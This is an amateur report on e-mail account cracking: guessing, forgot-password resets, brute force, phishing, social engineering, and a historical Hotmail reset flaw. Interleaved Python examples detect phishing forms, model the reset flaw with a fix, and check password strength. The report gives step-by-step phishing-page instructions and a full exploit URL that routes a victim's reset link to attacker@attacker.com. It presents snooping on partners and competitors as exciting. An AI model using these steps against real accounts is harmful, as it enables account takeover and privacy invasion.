
“E-MAIL HACKING”… EVEN U CAN HACK

A RESEARCH REPORT BY ASHISH KUMAR


SOURCE: ANKIT FADIA'S DISTANCE EDU. OF N/W SECURITY

Hacking e-mail accounts, stealing sensitive data, copying the address book, intercepting data, virus infections, password attacks, spoofed messages, abusive e-mails, Trojan attacks and espionage are some of the many concerns that have started affecting e-mail users worldwide. E-mail is also commonly exploited by computer criminals to execute privacy and identity attacks on unsuspecting victims. What would you do if somebody broke into your e-mail account and stole all your sensitive data? What would you do if somebody spoofed your identity and sent e-mails from your account? What would you do if you received abusive mails on your account? What would you do if someone broke into your e-mail account and used it to transfer funds from your bank account?

Your e-mail account has become more dangerous than anyone ever imagined! E-mail hacking, or rather cracking e-mail accounts, is one of the most common attacks on the Internet. The hugely critical role played by e-mail in today's world makes e-mail cracking all the more attractive from a criminal's point of view. A number of computer crime investigations also require police and forensic agencies to covertly break into suspects' e-mail accounts to gather evidence.

Possessive young lovers would do anything to be able to get a glance at their partner's e-mail account contents. Friends across educational institutions and organizations would love to break into each other's e-mail accounts simply for fun and jokes. In this age of corporate espionage, many organizations strive to break into their competitors' e-mail accounts to gather as much business intelligence as possible.

E-mail account cracking, or e-mail hacking, is indeed one of the most exciting and sought-after attacks on the Internet, though many industry veterans consider such attacks merely lame. Although there is no particular guaranteed method of breaking into a victim's e-mail account, there are definitely a few different techniques that are commonly used by attackers, namely:
1) Password Guessing
2) “Forgot Password” attacks
3) Brute Force Password cracking
4) Phishing attacks
5) Input Validation attacks
6) Social Engineering

These techniques are discussed in detail below:


…Ashish
report…

1. PASSWORD GUESSING:

• LOW THREAT LEVEL
• EASILY EXECUTED
• VERY COMMON, BUT NOT VERY EFFECTIVE

Even though the success rate of such attacks is very low, password guessing is probably one of the most commonly used password cracking techniques prevalent on the Internet. In this attack, the attacker first gathers as much personal information about the victim as possible (such as his phone number, birthday, parents' names, girlfriend's name, pet's name, etc.) and then simply tries his luck by entering different combinations (of names and numbers) by hit and trial at the password prompt. If the attacker is lucky, then one such random combination might actually work. Some of the most common passwords that an attacker usually guesses are:
1. Loved one's name + birthday/phone number, for example, Jiya18
2. Victim's own name + birthday/phone number, for example, vineetjain1
2. “FORGOT PASSWORD” ATTACK:

• MID THREAT LEVEL
• EASILY EXECUTED
• NOT VERY EFFECTIVE

The “Forgot Password” attack can definitely be labeled as an extension of the password guessing attack. All e-mail service providers have an option that allows users to reset or retrieve their e-mail account password by answering a few predefined questions. Ideally, e-mail service providers should ask users to enter only personal info to retrieve or reset the forgotten password. An attacker can easily find out info such as the zip/postal code, birth date, city, etc., reset the victim's password using the “Forgot Password” option, and then gain access to the victim's e-mail account.
For example, Yahoo requires users to enter only their birthday, zip code and country to reset the e-mail account password. This info is so public that many people can have access to it and easily reset the victim's e-mail account password:
On the other hand, Hotmail requires users to enter the above info, but it only asks users to answer a secret hint question:

3. BRUTE FORCE PASSWORD ATTACK:

• HIGH THREAT LEVEL
• VERY TEDIOUS & SLOW
• VERY EFFECTIVE

Brute force is probably one of the oldest techniques of password cracking known to the underground community. For most attackers, brute force password cracking remains the ultimate fallback attack if all other techniques fail. In this attack, an automatic tool or script tries all possible combinations of available keyboard keys as the victim's password. Such a hit-and-trial method of trying out all available permutations and combinations means that, irrespective of the victim's password, it will sooner or later definitely be cracked. As soon as the correct password is found, it is immediately displayed on the screen. Obviously, due to the extremely high number of possible combinations of keystrokes, brute force can sometimes take an extremely long time to reach the correct password. However, if an attacker is lucky, then this technique will reveal the correct password within a matter of seconds.
The success and speed of this method largely depend upon the strength of the victim's password and the level of the algorithm designed by the attacker. Currently I am working on code generation for function keys: all possible permutations and combinations.
4. PHISHING:

• VERY HIGH THREAT LEVEL
• EASILY EXECUTED
• MORE OR LESS EFFECTIVE

If one has used his e-mail account long enough, chances are that he has often been timed out, wherein his connection with the e-mail service provider times out and he is asked to log in again. The most natural reaction to this prompt for most e-mail users across the globe is to re-enter their username and password and continue surfing their e-mail contents. Phishing is a technique that exploits this very tendency of the majority of e-mail users.
Phishing is a technique in which the attacker creates a fake timed-out screen, re-login screen or error screen and sends it to the victim, hoping that he gets fooled into entering the account username and password. This account info reaches the attacker through a script, while the user is redirected to the homepage of the e-mail service provider. In most phishing attacks, the fake screens that are used to fool the victim are extremely accurate and look very real.
Most e-mail users do not remain very alert while checking their e-mail and are susceptible to such phishing attacks. Phishing attacks can be executed by the following steps:

1. The attacker creates a fake screen that will be used to fool the victim. Such fake phishing screens can usually be created easily by editing the HTML code from the respective e-mail service provider's website. It is important to note that attackers need to change the fake screen adequately to ensure that the account info gets sent to them rather than to the e-mail service provider. This again can be done with some basic knowledge of HTML.
For example, while creating the fake phishing screen for Hotmail, the attacker needs to change the ACTION field in the FORM tag and enter the victim's e-mail address:

2. Once the attacker has created the fake phishing screen, it has to be sent to the victim. The most common techniques used to send the fake screen to the victim are file attachments, HTML-embedded e-mails, ActiveX-enabled e-mails, HTA applications, physical access and many others.

3. Typically, as soon as the victim opens the fake screen, something like what is shown below is displayed on the screen. More often than not, users think that this screen has been sent by the authentic e-mail service provider and simply enter their correct account info. As soon as the victim clicks on the LOGIN or SIGN IN button, this sensitive account info gets sent to the attacker.
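Because the fake screen differs from the genuine one mainly in the ACTION field of its FORM tag, that field is what a mail filter or a cautious user can inspect. The following check is an added example, not part of the original report; the domain `mail.example` and both sample forms are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormCollector(HTMLParser):
    """Record every <form> ACTION and whether the form holds a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []        # each entry: [action, has_password_field]
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = [(attrs.get("action") or "").strip(), False]
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def suspicious_forms(html, provider_domain):
    """Return (action, reason) for password forms that do not post to the provider."""
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for action, has_password in collector.forms:
        if not has_password:
            continue
        url = urlparse(action)
        host = (url.hostname or "").lower()
        if url.scheme == "mailto":
            findings.append((action, "credentials are mailed out"))
        elif host != provider_domain and not host.endswith("." + provider_domain):
            findings.append((action, "does not post to the provider"))
        elif url.scheme != "https":
            findings.append((action, "credentials sent without TLS"))
    return findings

# Constructed samples: a provider's own login form and an edited copy of it.
GENUINE = '<form method="post" action="https://login.mail.example/auth">' \
          '<input name="user"><input type="password" name="pw"></form>'
EDITED = '<form method="post" action="mailto:drop@collector.example">' \
         '<input name="user"><input type="password" name="pw"></form>'

if __name__ == "__main__":
    print(suspicious_forms(GENUINE, "mail.example"))
    print(suspicious_forms(EDITED, "mail.example"))
```

A login form arriving as an attachment or inside an HTML e-mail is suspect even before this check; the check simply shows where the entered credentials would go.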

The Yahoo fake login and Hotmail timed-out screens are shown below:

5. INPUT VALIDATION ATTACKS:

• VERY HIGH THREAT LEVEL
• EASILY EXECUTED. NOT SO COMMON
• VERY EFFECTIVE

A number of web-based e-mail service providers on the Internet are vulnerable to input validation attacks. Such attacks can be used by computer criminals to gain illegitimate access to e-mail accounts.
One of the biggest and most dangerous input validation attacks existed in Microsoft Corporation's Hotmail and was known as the “Reset Password Input Validation” attack. This attack allowed an attacker to illegitimately reset the password of absolutely any Hotmail e-mail account holder without any proper authorization. This input validation loophole could easily be exploited to change the existing password of all Hotmail users without any kind of info gathering and without even answering any secret hint question.
This attack can be easily executed in the following steps:

1. Open your favorite Internet browser, such as Internet Explorer, Opera, Mozilla or others.
2. Copy and paste the URL given below into the address bar of the browser:

https://register.passport.net
e-mailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem
=attacker@attacker.com&rst=1

Where:
victim@hotmail.com represents the e-mail address of the victim whose password has to be changed or reset.
attacker@attacker.com represents the e-mail address of the attacker, to which the link to a page that allows the victim's password to be changed is sent.
3. Simply press Enter and an e-mail will be sent to the attacker's e-mail address (attacker@attacker.com) that will allow the attacker to change the victim's password without entering any authorization.
The Hotmail input validation attack is a typical example of an attack that allows the attacker access to a sensitive file or script without the necessary authentication. In this case, even an unauthorized attacker is allowed to access the Hotmail reset password script. Like most other input validation attacks, this vulnerability is also a result of poor programming practices.
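The programming mistake described above, a reset script that lets the request decide where the reset link goes, is shown here next to its fix. This is an added example and a simplified model, not Hotmail's actual code; only the parameter names `em` and `prefem` come from the URL above, while the host, path, accounts and function names are constructed.

```python
import secrets
from urllib.parse import urlsplit, parse_qs

# Constructed account store: login address -> recovery address held by the server.
ACCOUNTS = {"alice@mail.example": "alice.backup@other.example"}
TOKENS = {}   # reset token -> account it is allowed to reset
OUTBOX = []   # (recipient, token) pairs the handlers would e-mail

def _send_reset_link(account, recipient):
    token = secrets.token_urlsafe(32)   # unguessable, single-purpose token
    TOKENS[token] = account
    OUTBOX.append((recipient, token))
    return recipient

def _params(url):
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: values[0] for name, values in query.items()}

def reset_vulnerable(url):
    """Flawed model: the destination of the reset link is taken from the request."""
    p = _params(url)
    if p.get("em") not in ACCOUNTS:
        return None
    return _send_reset_link(p["em"], p.get("prefem"))

def reset_hardened(url):
    """Fixed model: 'prefem' is ignored; the destination comes from the stored record."""
    p = _params(url)
    account = p.get("em")
    if account not in ACCOUNTS:
        return None
    return _send_reset_link(account, ACCOUNTS[account])

# Constructed request in the shape of the URL above (hypothetical host and path).
REQUEST = ("https://reset.mail.example/pwdreset?lc=1033&em=alice@mail.example"
           "&id=&cb=&prefem=mallory@elsewhere.example&rst=1")

if __name__ == "__main__":
    print("vulnerable sends link to:", reset_vulnerable(REQUEST))
    print("hardened sends link to:  ", reset_hardened(REQUEST))
```

The hardened handler treats every request parameter as untrusted and takes the security-relevant value, the recipient, only from data the server already holds.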

6. SOCIAL ENGINEERING:

• MID THREAT LEVEL
• EASE OF EXECUTION VARIES
• EFFECTIVENESS VARIES

Social engineering is the art of talking to people in a persuasive and smooth manner in order to win their trust and then being able to make them reveal certain important bits of private info. An extremely large number of password cracking attacks on the Internet are executed using social engineering techniques.

COUNTER MEASURES:

• Try to use combinations of letters, numbers and special characters.
• Try to use both uppercase and lowercase letters.
• Try to choose a password that is not a word in the dictionary.
• The password should not be too short.
• Keep changing your password frequently.
• Do not use passwords that can easily be guessed, like phone numbers, birth dates, etc.
• Do not write down your passwords and store them near your computer.
• Do not use the same password for all your accounts.
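The checkable items in this list, together with the name-plus-number pattern from the password guessing section and the combination count from the brute force section, can be enforced when a password is chosen. The checker below is an added example, not part of the original report; the word list, the personal details and the minimum length of 10 are assumptions made for illustration.

```python
import math
import re
import string

# Constructed mini word list; a real check would load a full dictionary.
COMMON_WORDS = {"password", "welcome", "sunshine", "dragon", "monkey"}

def _has(pattern, text):
    return re.search(pattern, text) is not None

def search_space_bits(password):
    """log2 of the combinations brute force must cover for this length and character mix."""
    pool = (26 * _has(r"[a-z]", password) + 26 * _has(r"[A-Z]", password)
            + 10 * _has(r"[0-9]", password)
            + len(string.punctuation) * _has(r"[^a-zA-Z0-9]", password))
    return len(password) * math.log2(pool) if pool else 0.0

def check_password(password, personal_info, min_length=10):
    """Return the countermeasures a password violates; an empty list means it passes."""
    problems = []
    squeezed = re.sub(r"[^a-z0-9]", "", password.lower())
    if len(password) < min_length:          # min_length is an assumed threshold
        problems.append("too short")
    if not (_has(r"[a-z]", password) and _has(r"[A-Z]", password)):
        problems.append("needs uppercase and lowercase")
    if not (_has(r"[0-9]", password) and _has(r"[^a-zA-Z0-9]", password)):
        problems.append("needs numbers and special characters")
    if re.sub(r"[0-9]", "", squeezed) in COMMON_WORDS:
        problems.append("dictionary word")
    for item in personal_info:              # names, phone numbers, birthdays
        token = re.sub(r"[^a-z0-9]", "", item.lower())
        if len(token) >= 3 and token in squeezed:
            problems.append("contains personal info: " + item)
    return problems

if __name__ == "__main__":
    # The two guessable passwords quoted in section 1, with constructed personal details.
    print(check_password("Jiya18", ["Jiya", "9876543210"]))
    print(check_password("vineetjain1", ["Vineet Jain"]))
    print(round(search_space_bits("Jiya18"), 1))
```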